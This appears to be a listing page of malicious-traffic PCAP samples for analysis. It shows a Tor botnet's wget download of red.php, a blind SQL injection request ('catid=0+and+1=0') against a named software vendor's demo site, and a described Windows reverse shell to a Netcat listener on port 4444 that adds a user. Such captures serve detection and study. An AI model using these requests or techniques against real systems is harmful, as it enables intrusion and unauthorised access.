TOR Malware Botnet red.php PCAP file download traffic sample

Attachment: torbotnet
Date added: January 26, 2018 5:50 am
Added by: admin
File size: 755 KB

10 engines detected this file
SHA-256: 9b606e8e8e7ada9da2afdd3cea20d777f84da9f8b148a58385890e44743f733d
File name: red.php
File size: 488 KB
Last analysis: 2018-01-25 22:27:42 UTC

2018-01-25 22:23:49.279103 IP > Flags [P.], seq 0:154, ack 1, win 256, length 154: HTTP: GET /agenti/red.php HTTP/1.1
GET /agenti/red.php HTTP/1.1
User-Agent: Wget/1.19.4 (mingw32)
Accept: …

Active Business Directory v2 Remote Blind SQL Injection Attack Exploit Traffic PCAP

2009-01-01 09:36:59.374040 PPPoE [ses 0x976] IP > Flags [P.], seq 1:438, ack 1, win 65535, length 437: HTTP: GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
GET /demoactivebusinessdirectory/default.asp?catid=0+and+1=0 HTTP/1.1
Host: www.activewebsoftwares.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv: Gecko/2008120122 Firefox/3.0.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-gb,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive

2009-01-01 09:37:00.221949 PPPoE [ses 0x976] IP > Flags [.], …

Converted PCAP sample of a Microsoft Windows Reverse Shell

Converted PCAP sample of a Microsoft Windows reverse shell. The shell is spawned on port 4444: the hacked PC initiates the connection to a host which has a Netcat listener waiting on port 4444 to spawn a command line shell on connect. You can see that once the shell is spawned a user is created and added …